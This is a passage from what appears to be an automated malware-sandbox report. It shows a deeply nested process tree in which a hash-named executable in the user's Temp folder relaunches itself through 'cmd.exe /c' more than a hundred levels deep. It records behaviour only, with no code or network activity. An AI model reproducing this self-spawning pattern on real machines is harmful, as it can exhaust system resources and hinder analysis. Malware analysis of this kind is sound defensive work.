C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
39⤵
PID:3852

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
40⤵
PID:3084

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
41⤵
PID:3868

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
42⤵
PID:3992

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
43⤵
PID:992

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
44⤵
PID:1712

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
45⤵
PID:4612

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
46⤵
PID:4768

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
47⤵
PID:4828

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
48⤵
PID:1004

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
49⤵
PID:3692

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
50⤵
PID:5100

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
51⤵
PID:1108

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
52⤵
PID:4368

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
53⤵
PID:4520

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
54⤵
PID:3472

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
55⤵
PID:3624

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
56⤵
PID:1944

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
57⤵
PID:4216

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
58⤵
PID:3968

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
59⤵
PID:4644

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
60⤵
PID:4392

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
61⤵
PID:4048

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
62⤵
PID:3212

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
63⤵
PID:3904

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
64⤵
PID:4516

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
65⤵
PID:4032

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
66⤵
PID:1600

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
67⤵
PID:3180

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
68⤵
PID:4416

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
69⤵
PID:60

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
70⤵
PID:4484

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
71⤵
PID:1312

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
72⤵
PID:3640

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
73⤵
PID:2604

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
74⤵
PID:4320

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
75⤵
PID:4188

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
76⤵
PID:624

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
77⤵
PID:4596

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
78⤵
PID:3572

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
79⤵
PID:772

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
80⤵
PID:4656

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
81⤵
PID:4648

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
82⤵
PID:1564

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
83⤵
PID:2224

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
84⤵
PID:3852

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
85⤵
PID:2408

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
86⤵
PID:836

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
87⤵
PID:5080

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
88⤵
PID:3472

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
89⤵
PID:4860

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
90⤵
PID:1500

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
91⤵
PID:1944

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
92⤵
PID:3108

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
93⤵
PID:3488

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
94⤵
PID:724

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
95⤵
PID:636

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
96⤵
PID:4572

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
97⤵
PID:1408

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
98⤵
PID:4436

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
99⤵
PID:4776

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
100⤵
PID:2328

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
101⤵
PID:4936

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
102⤵
PID:4820

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
103⤵
PID:4768

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
104⤵
PID:4988

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
105⤵
PID:2992

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
106⤵
PID:3416

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
107⤵
PID:4192

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
108⤵
PID:4796

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
109⤵
PID:4336

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
110⤵
PID:4384

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
111⤵
PID:3868

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
112⤵
PID:4928

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
113⤵
PID:772

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
114⤵
PID:4256

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
115⤵
PID:1312

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
116⤵
PID:3528

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
117⤵
PID:4404

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
118⤵
PID:2408

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
119⤵
PID:3104

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
120⤵
PID:2384

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
121⤵
PID:4708

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
122⤵
PID:5072

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
123⤵
PID:1472

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
124⤵
PID:2496

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
125⤵
PID:1160

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
126⤵
PID:4660

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
127⤵
PID:3972

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
128⤵
PID:3496

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
129⤵
PID:3852

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
130⤵
PID:4848

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
131⤵
PID:2376

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
132⤵
PID:2780

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
133⤵
PID:4460

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
134⤵
PID:836

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
135⤵
PID:4160

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
136⤵
PID:4968

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
137⤵
PID:4400

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
138⤵
PID:1332

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
139⤵
PID:2128

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
140⤵
PID:3972

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
141⤵
PID:5060

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
142⤵
PID:676

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
143⤵
PID:1664

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
144⤵
PID:1340

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
145⤵
PID:1372

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
146⤵
PID:3836

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
147⤵
PID:4688

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
148⤵
PID:4916

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
149⤵
PID:4628

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
150⤵
PID:440

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
151⤵
PID:1312

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0"
152⤵
PID:1588

C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0.exe
C:\Users\Admin\AppData\Local\Temp\10761618fcb66dbe87890e55b0ec0ebf578d062c78a1287985b3b96e49e2a3e0
153⤵
PID:4440

C:\Windows\SysWOW64\cmd.exe
